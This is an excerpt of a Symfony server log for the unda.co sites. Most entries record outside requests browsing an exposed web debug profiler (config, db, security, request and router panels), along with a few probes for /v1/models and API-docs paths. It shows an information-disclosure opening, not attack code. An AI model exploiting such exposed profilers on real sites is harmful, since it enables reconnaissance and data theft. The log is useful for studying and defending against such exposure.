  9858. [2025-12-21 04:52:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/models"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/models\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9859. [2025-12-21 04:53:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/models" (from "https://35.175.10.94/v1/models")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/models\" (from \"https://35.175.10.94/v1/models\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9860. [2025-12-21 04:53:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v1/models" (from "https://35.175.10.94/v1/models")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v1/models\" (from \"https://35.175.10.94/v1/models\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9861. [2025-12-21 04:54:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=85.217.140.1&limit=10","method":"GET"} []
  9862. [2025-12-21 04:54:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10","method":"GET"} []
  9863. [2025-12-21 04:54:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=twig","method":"GET"} []
  9864. [2025-12-21 04:54:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9865. [2025-12-21 04:55:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"86adc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/86adc0?panel=swiftmailer","method":"GET"} []
  9866. [2025-12-21 04:55:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  9867. [2025-12-21 04:58:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=exception","method":"GET"} []
  9868. [2025-12-21 04:58:49] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"f40bbd","_route":"_profiler_exception_css"},"request_uri":"https://auth.unda.co/_profiler/f40bbd/exception.css","method":"GET"} []
  9869. [2025-12-21 04:58:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  9870. [2025-12-21 04:58:49] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"f40bbd","_route":"_profiler_exception"},"request_uri":"https://auth.unda.co/_profiler/f40bbd/exception","method":"GET"} []
  9871. [2025-12-21 05:01:35] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  9872. [2025-12-21 05:03:26] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0c9887","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/0c9887/search/results?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
  9873. [2025-12-21 05:03:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
  9874. [2025-12-21 05:07:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=exception","method":"GET"} []
  9875. [2025-12-21 05:07:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  9876. [2025-12-21 05:07:16] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"132e26","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/132e26/search/results?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
  9877. [2025-12-21 05:07:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
  9878. [2025-12-21 05:07:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
  9879. [2025-12-21 05:07:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=36.72.159.194&limit=10&method=GET","method":"GET"} []
  9880. [2025-12-21 05:08:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=events","method":"GET"} []
  9881. [2025-12-21 05:08:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9882. [2025-12-21 05:12:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=logger","method":"GET"} []
  9883. [2025-12-21 05:12:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  9884. [2025-12-21 05:12:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=db","method":"GET"} []
  9885. [2025-12-21 05:12:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  9886. [2025-12-21 05:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=request","method":"GET"} []
  9887. [2025-12-21 05:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  9888. [2025-12-21 05:13:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=exception","method":"GET"} []
  9889. [2025-12-21 05:13:46] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"65f2be","_route":"_profiler_exception_css"},"request_uri":"https://web.unda.co/_profiler/65f2be/exception.css","method":"GET"} []
  9890. [2025-12-21 05:13:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  9891. [2025-12-21 05:13:46] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"65f2be","_route":"_profiler_exception"},"request_uri":"https://web.unda.co/_profiler/65f2be/exception","method":"GET"} []
  9892. [2025-12-21 05:13:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=events","method":"GET"} []
  9893. [2025-12-21 05:13:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9894. [2025-12-21 05:14:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=router","method":"GET"} []
  9895. [2025-12-21 05:14:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  9896. [2025-12-21 05:14:11] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"65f2be","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/65f2be/router","method":"GET"} []
  9897. [2025-12-21 05:15:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=security","method":"GET"} []
  9898. [2025-12-21 05:15:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  9899. [2025-12-21 05:15:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=cache","method":"GET"} []
  9900. [2025-12-21 05:15:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  9901. [2025-12-21 05:15:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?group=1&panel=db","method":"GET"} []
  9902. [2025-12-21 05:15:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  9903. [2025-12-21 05:16:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=twig","method":"GET"} []
  9904. [2025-12-21 05:16:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9905. [2025-12-21 05:16:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=dump","method":"GET"} []
  9906. [2025-12-21 05:16:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  9907. [2025-12-21 05:16:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=config","method":"GET"} []
  9908. [2025-12-21 05:16:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9909. [2025-12-21 05:17:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e462c1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e462c1","method":"GET"} []
  9910. [2025-12-21 05:17:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  9911. [2025-12-21 05:17:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=events","method":"GET"} []
  9912. [2025-12-21 05:17:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9913. [2025-12-21 05:17:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=time","method":"GET"} []
  9914. [2025-12-21 05:17:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  9915. [2025-12-21 05:18:13] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"65f2be","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/65f2be/search/results?ip=216.73.216.212","method":"GET"} []
  9916. [2025-12-21 05:18:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=216.73.216.212","method":"GET"} []
  9917. [2025-12-21 05:18:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"empty","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/empty/search/results","method":"GET"} []
  9918. [2025-12-21 05:18:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  9919. [2025-12-21 05:18:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=request","method":"GET"} []
  9920. [2025-12-21 05:18:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  9921. [2025-12-21 05:19:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=form","method":"GET"} []
  9922. [2025-12-21 05:19:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  9923. [2025-12-21 05:19:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=events","method":"GET"} []
  9924. [2025-12-21 05:19:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  9925. [2025-12-21 05:19:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest","method":"GET"} []
  9926. [2025-12-21 05:19:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
  9927. [2025-12-21 05:19:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=swiftmailer","method":"GET"} []
  9928. [2025-12-21 05:19:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  9929. [2025-12-21 05:19:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"65f2be","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/65f2be?panel=validator","method":"GET"} []
  9930. [2025-12-21 05:19:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  9931. [2025-12-21 05:24:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=config","method":"GET"} []
  9932. [2025-12-21 05:24:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  9933. [2025-12-21 05:27:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=twig","method":"GET"} []
  9934. [2025-12-21 05:27:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  9935. [2025-12-21 05:30:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32afde","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32afde?panel=db","method":"GET"} []
  9936. [2025-12-21 05:30:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  9937. [2025-12-21 05:30:26] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"cb0b1c","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/cb0b1c/search/results?ip=66.249.75.22&limit=10&method=GET","method":"GET"} []
  9938. [2025-12-21 05:30:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=66.249.75.22&limit=10&method=GET","method":"GET"} []
  9939. [2025-12-21 05:30:34] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e9be58","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/e9be58/search/results?limit=10&method=GET","method":"GET"} []
  9940. [2025-12-21 05:30:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  9941. [2025-12-21 05:35:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=router","method":"GET"} []
  9942. [2025-12-21 05:35:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  9943. [2025-12-21 05:35:50] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"3926d2","_route":"_profiler_router"},"request_uri":"https://web.unda.co/_profiler/3926d2/router","method":"GET"} []
  9944. [2025-12-21 05:42:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
  9945. [2025-12-21 05:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10&url=https%3A%2F%2F35.175.10.94%2F","method":"GET"} []
  9946. [2025-12-21 05:45:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  9947. [2025-12-21 05:47:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"1dc617","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/1dc617/search/results?limit=10&method=GET","method":"GET"} []
  9948. [2025-12-21 05:47:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  9949. [2025-12-21 05:48:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  9950. [2025-12-21 05:52:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71","method":"GET"} []
  9951. [2025-12-21 05:52:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  9952. [2025-12-21 05:54:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=logger","method":"GET"} []
  9953. [2025-12-21 05:54:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  9954. [2025-12-21 05:55:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  9955. [2025-12-21 05:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=router","method":"GET"} []
  9956. [2025-12-21 05:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
